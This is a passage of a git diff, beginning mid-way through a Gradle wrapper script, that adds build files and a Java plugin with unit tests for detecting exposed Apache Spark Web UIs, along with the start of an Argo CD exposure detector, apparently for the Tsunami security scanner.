+# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_spark_exposed_webui/gradlew.bat b/community/detectors/apache_spark_exposed_webui/gradlew.bat new file mode 100644 index 000000000..25da30dbd --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/apache_spark_exposed_webui/settings.gradle b/community/detectors/apache_spark_exposed_webui/settings.gradle new file mode 100644 index 000000000..8aaafed2c --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/settings.gradle @@ -0,0 +1,2 @@ +rootProject.name = 'apache_sparks_exposed_webui' + diff --git a/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetector.java b/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetector.java new file mode 100644 index 000000000..c2af3f696 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetector.java @@ -0,0 +1,132 @@ +package com.google.tsunami.plugins.detectors.apachesparksexposedwebui; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.get; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import java.util.regex.Pattern; +import javax.inject.Inject; + +/** A Tsunami plugin for detecting an exposed Apache Spark Web UI. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "ApacheSparksExposedWebuiVulnDetector", + version = "0.1", + description = + "This plugin detects an exposed Apache Spark Web UI which discloses information about the" + + " Apache Spark environment and its' tasks.", + author = "Timo Mueller (work@mtimo.de)", + bootstrapModule = ApacheSparksExposedWebuiVulnDetectorBootstrapModule.class) +public final class ApacheSparksExposedWebuiVulnDetector implements VulnDetector { + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private static final Pattern VULNERABILITY_RESPONSE_PATTERN_TENTATIVE = + Pattern.compile("Spark "); + private static final Pattern VULNERABILITY_RESPONSE_PATTERN_CONFIRMATION = + Pattern.compile("onClick=\"collapseTable\\('collapse-aggregated-"); + + @Inject + ApacheSparksExposedWebuiVulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) { + logger.atInfo().log("ApacheSparksExposedWebuiVulnDetector starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + + try { + HttpResponse response = + httpClient.send( + get(targetUri) + .setHeaders( + HttpHeaders.builder().addHeader("User-Agent", "TSUNAMI_SCANNER").build()) + .build(), + networkService); + if (response.status() == HttpStatus.OK && response.bodyString().isPresent()) { + String responseBody = response.bodyString().get(); + if (VULNERABILITY_RESPONSE_PATTERN_TENTATIVE.matcher(responseBody).find() + && VULNERABILITY_RESPONSE_PATTERN_CONFIRMATION.matcher(responseBody).find()) { + return true; + } + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); + } + + return false; + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("Apache_Spark_Exposed_WebUI")) + .setSeverity(Severity.MEDIUM) + .setTitle( + "Exposed Apache Spark UI which discloses information about the Apache Spark" + + " environment and its' tasks.") + .setDescription( + "An exposed Apache Spark Web UI provides attackers information about the Apache" + + " Spark UI and its' tasks. The disclosed information might leak other" + + " configured Apache Spark nodes and the output of previously run tasks." + + " Depending on the task, the output might contain sensitive information" + + " which was logged during the task execution.") + .setRecommendation( + "Don't expose the Apache Spark Web UI to unauthenticated attackers.")) + .build(); + } +} diff --git a/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorBootstrapModule.java b/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorBootstrapModule.java new file mode 100644 index 000000000..abe3173ce --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorBootstrapModule.java @@ -0,0 +1,28 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.apachesparksexposedwebui; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** A {@link PluginBootstrapModule} for {@link ApacheSparksExposedWebuiVulnDetector}. */ +public final class ApacheSparksExposedWebuiVulnDetectorBootstrapModule + extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(ApacheSparksExposedWebuiVulnDetector.class); + } +} diff --git a/community/detectors/apache_spark_exposed_webui/src/test/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorTest.java b/community/detectors/apache_spark_exposed_webui/src/test/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorTest.java new file mode 100644 index 000000000..6d3d05ceb --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/src/test/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorTest.java @@ -0,0 +1,176 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.apachesparksexposedwebui; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkEndpoint; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** tests for {@link ApacheSparksExposedWebuiVulnDetector}. */ +@RunWith(JUnit4.class) +public final class ApacheSparksExposedWebuiVulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject private ApacheSparksExposedWebuiVulnDetector detector; + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().build(), + new ApacheSparksExposedWebuiVulnDetectorBootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws Exception { + mockWebServer.shutdown(); + } + + @Test + public void detect_ifVulnerable_reportsVuln() throws IOException { + mockWebServer.setDispatcher(new VulnerableEndpointDispatcher()); + mockWebServer.start(); + + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + + DetectionReportList detectionReports = + detector.detect( + buildTargetInfo(forHostname(mockWebServer.getHostName())), ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("Apache_Spark_Exposed_WebUI")) + .setSeverity(Severity.MEDIUM) + .setTitle( + "Exposed Apache Spark UI which discloses information about the Apache" + + " Spark environment and its' tasks.") + .setDescription( + "An exposed Apache Spark Web UI provides attackers information about" + + " the Apache Spark UI and its' tasks. The disclosed information" + + " might leak other configured Apache Spark nodes and the output" + + " of previously run tasks. Depending on the task, the output" + + " might contain sensitive information which was logged during the" + + " task execution.") + .setRecommendation( + "Don't expose the Apache Spark Web UI to unauthenticated attackers.")) + .build()); + } + + @Test + public void detect_ifNotVulnerable_doNotReportsVuln() throws IOException { + mockWebServer.setDispatcher(new SafeEndpointDispatcher()); + mockWebServer.start(); + + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + + DetectionReportList detectionReports = + detector.detect( + buildTargetInfo(forHostname(mockWebServer.getHostName())), ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private static final class VulnerableEndpointDispatcher extends Dispatcher { + + @Override + public MockResponse dispatch(RecordedRequest recordedRequest) { + return new MockResponse() + .setResponseCode(HttpStatus.OK.code()) + .setBody( + "<title>Spark Worker at 192.168.48.3:36075"); + } + } + + private static final class SafeEndpointDispatcher extends Dispatcher { + + @Override + public MockResponse dispatch(RecordedRequest recordedRequest) { + return new MockResponse().setResponseCode(HttpStatus.FORBIDDEN.code()).setBody(""); + } + } + + private static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } +} diff --git a/community/detectors/argocd_exposed_ui/README.md b/community/detectors/argocd_exposed_ui/README.md new file mode 100644 index 000000000..7eaf53ed1 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/README.md @@ -0,0 +1,15 @@ +# Exposed Argo CD instances Detector + +This Tsunami plugin tests to see if the Argo CD Instances are misconfigured and +exposed. It Also Checks for CVE-2022-29165 which is an authentication bypass and +try to create a separate report for this Vulnerability. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/argocd_exposed_ui/build.gradle b/community/detectors/argocd_exposed_ui/build.gradle new file mode 100644 index 000000000..05b9f058a --- /dev/null +++ b/community/detectors/argocd_exposed_ui/build.gradle @@ -0,0 +1,69 @@ +plugins { + id 'java-library' +} + +description = 'Exposed Argo CD instances VulnDetector plugin.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + okhttpVersion = '3.12.0' + truthVersion = '1.0.1' + guiceVersion = '4.2.3' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation 'com.google.auto.value:auto-value:1.10.4' + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.inject:guice:${guiceVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} diff --git a/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.jar b/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..2c3521197 Binary files /dev/null and b/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.properties b/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/argocd_exposed_ui/gradlew b/community/detectors/argocd_exposed_ui/gradlew new file mode 100755 index 000000000..f5feea6d6 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/gradlew @@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi 